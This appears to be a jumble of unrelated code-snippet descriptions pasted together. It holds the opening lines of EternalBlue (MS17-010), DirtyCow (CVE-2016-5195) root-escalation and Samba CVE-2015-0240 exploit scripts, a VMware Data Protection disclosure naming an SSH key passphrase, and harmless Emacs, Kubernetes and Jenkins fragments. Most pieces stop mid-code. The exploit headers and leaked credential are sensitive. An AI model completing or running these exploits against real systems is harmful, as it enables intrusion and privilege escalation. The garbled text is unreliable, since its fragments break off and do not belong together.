An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent libssh bug.
(defun my-lisp-load (filename)
  "Load lisp from FILENAME"
  (let ((fullname (expand-file-name (concat "spec/" filename) user-emacs-directory))
        lisp)
    (when (file-readable-p fullname)
      (with-temp-buffer
        (progn
          (insert-file-contents fullname)
          (setq lisp
                (condition-case nil
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
The VMware vSphere Data Protection (VDP) appliance is based on the EMC Avamar solution. To perform an in-depth analysis of VDP, a virtual test appliance of EMC Avamar was downloaded. The known Avamar default credentials worked on the Avamar appliance, but were not valid for logging in to vSphere Data Protection. Further analysis of file system objects in the EMC Avamar appliance led to the discovery of a private SSH key belonging to the admin user.
A web search revealed that the corresponding password for the SSH key file is ‘P3t3rPan’ (see http://judsonian.com/content/licensing-an-avamar-system/). Using the SSH key file, a login as admin to VMware Data Protection was successful and granted root permissions on the appliance.
11.08.2016 report of vulnerability to VMware Security Response team
/*
 * CVE-2016-5195 dirtypoc
 *
 * This PoC is memory only and doesn't write anything on the filesystem.
 * /!\ Beware, it triggers a kernel crash a few minutes.
 *
 * gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
 */
#define _GNU_SOURCE
/*
 * (un)comment correct payload first (x86 or x64)!
 *
 * $ gcc cowroot.c -o cowroot -pthread
 * $ ./cowroot
 * DirtyCow root privilege escalation
 * Backing up /usr/bin/passwd.. to /tmp/bak
 * Size of binary: 57048
 * Racing, this may take a while..
 * /usr/bin/passwd overwritten
Set up Kubernetes on 3 Debian Jessie virtual machines: One master. Two nodes. Additionally do this without any "magic" so that what is required to be running to make everything work is plain and obvious.
We will be using flannel for the inter-machine networking layer. Mainly because it is useful and it seems to be pretty popular.
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
Simple collection of Groovy scripts to help me maintain some Jenkins systems.
See also https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console
Please comment & let me know if you have a fork / fixes you'd like to include.